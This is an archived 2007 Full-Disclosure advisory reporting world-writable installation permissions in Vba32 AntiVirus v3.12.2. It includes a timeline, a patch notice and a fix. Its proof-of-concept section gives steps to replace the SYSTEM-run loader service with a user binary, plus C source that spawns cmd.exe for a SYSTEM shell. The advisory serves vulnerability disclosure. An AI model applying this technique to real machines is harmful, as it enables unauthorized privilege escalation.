| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 04 Oct 2007 12:58:42 -0400
From: <edi.strosar@...nostne-novice.com>
To: "Full Disclosure" <full-disclosure@...ts.grok.org.uk>
Subject: Vba32 AntiVirus v3.12.2 insecure file permissions
=========================================================================
Team Intell Security Advisory TISA2007-12-Private
-------------------------------------------------------------------------
Vba32 AntiVirus v3.12.2 insecure file permissions
=========================================================================
Release date: 04.10.2007
Severity: Moderately critical
Impact: Privilege escalation
Remote: No
Status: Official patch available
Software: Vba32 AntiVirus v3.12.2
Tested on: Microsoft Windows XP SP2
Vendor: http://www.anti-virus.by/en/
Disclosed by: Edi Strosar (Team Intell)
Vendor's description of affected application:
=============================================
"Antivirus program for personal computers running Windows
which is a reliable and, it is crucial, quick tool to
detect and neutralize computer viruses, mail worms, trojan
programs and other malware (backdoors, adware, spyware,
etc) in real time and by request."
Download link:
http://www.anti-virus.by/en/personal.html
Analysis:
=========
Vba32 AntiVirus v3.12.2 is prone to security issue which
can be exploited by LUA users to gain escalated
privileges.
The problem is caused due to the application setting
insecure default permissions (grants Everyone:Write
access) on the Vba32 installation directory and all it's
child objects. This can be exploited to remove,
manipulate, and replace any of the application's files.
Successful exploitation allows execution of arbitrary code
with SYSTEM privileges.
Proof of concept:
=================
- logon as LUA user
- rename vba32ldr.exe to vba32ldr.exe.BAK
- copy program.exe to Vba32 installation directory
- rename program.exe to vba32ldr.exe
- restart the computer
- "rootshell" ;)
Note: vba32ldr.exe is Vba32 Loader Service that runs as NT
AUTHORITY\SYSTEM.
Tested on Vba32 AntiVirus v3.12.2. Other versions may be
affected.
Source code for program.exe:
============================
#include <stdio.h>
int main()
{
system("cmd.exe");
return 0;
}
Solution:
=========
Set proper permissions on the Vba32 installation directory
and all it's child objects. NOTE: this may impact the
functionality.
Timeline:
=========
10.08.2007 - initial vendor notification
11.08.2007 - initial vendor response
22.08.2007 - additional vendor notification
27.08.2007 - additional vendor response
24.09.2007 - patch released
04.10.2007 - public disclosure
Contact:
========
Maldin d.o.o.
Trzaska cesta 2
1000 Ljubljana - SI
tel: +386 (0)590 70 170
fax: +386 (0)590 70 177
gsm: +386 (0)31 816 400
web: www.teamintell.com
e-mail: info@...mintell.com
Disclaimer:
===========
The content of this report is purely informational and
meant for educational purposes only. Maldin d.o.o. shall
in no event be liable for any damage whatsoever, direct or
implied, arising from use or spread of this information.
Any use of information in this advisory is entirely at
user's own risk.
=========================================================================
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists